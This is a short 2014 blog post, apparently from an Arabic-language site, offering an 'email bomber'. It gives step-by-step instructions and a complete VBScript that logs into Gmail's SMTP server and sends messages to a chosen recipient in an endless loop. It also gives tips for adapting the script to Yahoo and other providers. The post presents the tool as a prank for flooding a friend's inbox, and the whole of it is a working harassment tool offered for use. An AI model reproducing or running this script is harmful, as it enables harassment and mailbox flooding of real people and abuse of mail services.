الثلاثاء، 7 يناير 2014

EMAIL Bomber in Batch

EMAIL BOMBER

Here is a script with the help of which you can flood your friends mail box with an infinite number of emails.
for doing this you have to follow the following steps.

Step 1: Open notepad
Step 2: Copy the code given below and paste in to the notepad
Dim value
value=1
on error resume next
Const schema   = "http://schemas.microsoft.com/cdo/configuration/"
Const cdoBasic = 1
Const cdoSendUsingPort = 2
Dim oMsg, oConf
' E-mail properties
Set oMsg      = CreateObject("CDO.Message")
oMsg.From     = "sender@gmail.com"
oMsg.To       = "reciever@mail.com"
oMsg.Subject  = "message subject what u want"
oMsg.TextBody = "If you can read this, the script worked!"
' GMail SMTP server configuration and authentication info
do
Set oConf = oMsg.Configuration
oConf.Fields(schema & "smtpserver")       = "smtp.gmail.com" 'server address
oConf.Fields(schema & "smtpserverport")   = 465              'port number
oConf.Fields(schema & "sendusing")        = cdoSendUsingPort
oConf.Fields(schema & "smtpauthenticate") = cdoBasic         'authentication type
oConf.Fields(schema & "smtpusessl")       = True             'use SSL encryption
oConf.Fields(schema & "sendusername")  = "sender@gmail.com" 'senderusername
oConf.Fields(schema & "sendpassword")     = "password"      'sender password
oConf.Fields.Update()
' send message
oMsg.Send()
Loop Until value=2
Step 3: In the above code edit the sender's and receiver's email id and senders password..
Step 4: Now save the file as "something.vbs"
Step 5: All done now just double click on your something.vbs file and see the results.

NOTE : here in this code senders id must be in gmail.com for if senders email id other than gmail then you have to configure server configuration accordingly...
Change the loop value as you want ..

Like yahoo 


Yahoo
POP3: pop.mail.yahoo.comSMTP: smtp.mail.yahoo.com
POP3 PORT :110SMTP PORT: 25
Note: You must subscribe to Yahoo's Premium service to access your email via POP, free accounts can not use this option.
Just google the mail service port number
Ex: hotmail port number 


0 التعليقات:

إرسال تعليق